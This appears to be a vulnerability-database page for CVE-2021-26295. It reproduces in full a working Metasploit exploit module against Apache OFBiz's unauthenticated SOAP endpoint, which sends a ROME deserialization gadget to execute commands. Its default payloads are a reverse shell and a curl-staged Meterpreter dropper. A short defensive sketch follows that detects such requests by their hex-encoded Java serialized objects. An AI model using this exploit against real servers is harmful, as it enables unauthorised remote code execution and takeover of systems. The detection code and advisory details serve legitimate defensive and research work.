Apache OFBiz SOAP Java Deserialization

06 Apr 2021 00:00:00 | Reported by Spencer McIntyre | Type: packetstorm | Source: packetstormsecurity.com | 551 Views

The Apache OFBiz SOAP Java Deserialization module exploits a Java deserialization vulnerability in Apache OFBiz's unauthenticated SOAP endpoint for versions prior to 17.12.06.

Related

| Reporter | Title | Published | Family |
| --- | --- | --- | --- |
| 0day.today | Apache OFBiz SOAP Java Deserialization Exploit | 7 Apr 2021 00:00 | zdt |
| GithubExploit | Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 13 May 2021 13:28 | githubexploit |
| GithubExploit | Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 24 Mar 2021 08:25 | githubexploit |
| GithubExploit | Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 23 Mar 2021 15:25 | githubexploit |
| ATTACKERKB | CVE-2020-9496 | 15 Jul 2020 00:00 | attackerkb |
| ATTACKERKB | CVE-2021-26295 | 22 Mar 2021 00:00 | attackerkb |
| Tenable Nessus | Apache OFBiz Remote Code Execution (CVE-2021-26295) | 30 Mar 2021 00:00 | nessus |
| Circl | CVE-2021-26295 | 22 Mar 2021 09:43 | circl |
| CNNVD | Apache OFBiz Code Issue Vulnerability | 22 Mar 2021 00:00 | cnnvd |
| CNVD | Apache OFBiz RCE Vulnerability | 22 Mar 2021 00:00 | cnvd |

Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::JavaDeserialization

  XML_NS = {
    'serResponse' => 'http://ofbiz.apache.org/service/',
    'soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/'
  }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache OFBiz SOAP Java Deserialization',
        'Description' => %q{
          This module exploits a Java deserialization vulnerability in Apache
          OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for
          versions prior to 17.12.06.
        },
        'Author' => [
          'yumusb', # original PoC
          'Spencer McIntyre', # metasploit module
          'wvu' # metasploit module
        ],
        'References' => [
          [ 'CVE', '2021-26295' ],
          [ 'URL', 'https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py' ],
          [ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12167' ]
        ],
        'DisclosureDate' => '2021-03-22', # NVD publish date
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'CMDSTAGER::FLAVOR' => :curl,
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
              }
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => {
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      Opt::RPORT(8443),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    # Send an empty serialized object
    res = send_request_soap('')

    unless res
      return CheckCode::Unknown('Target did not respond to check.')
    end

    messages = {}
    res.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry|
      key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s
      messages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s
    end

    if messages['errorMessage']&.start_with?('Problem deserializing object from byte array')
      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
    end

    CheckCode::Safe('Target cannot deserialize arbitrary data.')
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    res = send_request_soap(
      # framework/webapp/lib/rome-0.9.jar
      generate_java_deserialization_for_command('ROME', 'bash', cmd)
    )

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
    end

    print_good("Successfully executed command: #{cmd}")
  end

  def send_request_soap(data)
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/webtools/control/SOAPService'),
      'ctype' => 'text/xml',
      'data' => <<~XML
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header/>
          <soapenv:Body>
            <ser>
              <map-HashMap>
                <map-Entry>
                  <map-Key>
                    <cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj>
                  </map-Key>
                  <map-Value>
                    <std-String value="http://#{Faker::Internet.domain_name}"/>
                  </map-Value>
                </map-Entry>
              </map-HashMap>
            </ser>
          </soapenv:Body>
        </soapenv:Envelope>
      XML
    )
  end

end
```
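The module notes `IOC_IN_LOGS`, and the request it sends has a recognisable shape: a POST to `/webtools/control/SOAPService` whose `<cus-obj>` element carries plain hex. The following detection sketch is an added example, not part of the Metasploit module or of OFBiz; the function names and the sample envelope are constructed for illustration, and it assumes the HTTP method, path and body are available from a proxy or WAF log.

```ruby
# Added example, not part of the Metasploit module above.
# Java serialization streams start with STREAM_MAGIC (0xACED) + STREAM_VERSION (0x0005).
JAVA_STREAM_MAGIC = "\xAC\xED\x00\x05".b.freeze
SOAP_PATH = '/webtools/control/SOAPService'
PROBE_ERROR = 'Problem deserializing object from byte array'
# <cus-obj> with an optional namespace prefix; the module sends it unprefixed.
CUS_OBJ_RE = %r{<(?:[\w.-]+:)?cus-obj\b[^>]*>(.*?)</(?:[\w.-]+:)?cus-obj\s*>}im

# Return the text of every <cus-obj> element with whitespace removed.
def cus_obj_payloads(body)
  body.scan(CUS_OBJ_RE).flatten.map { |text| text.gsub(/\s+/, '') }
end

# Classify one <cus-obj> value by what its hex decodes to.
def classify_cus_obj(hex)
  return :empty if hex.empty?                        # shape of the module's check probe
  return :not_hex unless hex.match?(/\A(?:\h\h)+\z/)

  raw = [hex].pack('H*')                             # hex -> bytes
  raw.start_with?(JAVA_STREAM_MAGIC) ? :java_serialized : :hex_other
end

# Findings for one HTTP request; [] when it is not a POST to the SOAP endpoint.
def inspect_request(method, path, body)
  return [] unless method.casecmp?('POST') && path.sub(/\?.*/, '').end_with?(SOAP_PATH)

  cus_obj_payloads(body).map { |hex| classify_cus_obj(hex) }
end

# True when a response carries the error string the module's check looks for.
def deserialization_error?(response_body)
  response_body.include?(PROBE_ERROR)
end

# Constructed sample: envelope shaped like the module's request. The hex is a
# harmless serialized java.lang.String "hi" (TC_STRING 0x74, length 2).
def sample_body(hex)
  '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">' \
    "<soapenv:Body><ser><map-HashMap><map-Entry><map-Key><cus-obj>#{hex}</cus-obj>" \
    '</map-Key></map-Entry></map-HashMap></ser></soapenv:Body></soapenv:Envelope>'
end

p inspect_request('POST', '/webtools/control/SOAPService', sample_body('aced00057400026869'))
p inspect_request('POST', '/webtools/control/SOAPService', sample_body(''))
```

An `:empty` or `:java_serialized` finding on this endpoint from an unauthenticated client is worth alerting on; the page gives 17.12.06 as the first version not affected.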

Vulners AI Score: 0.3 (Low risk)
EPSS: 0.94237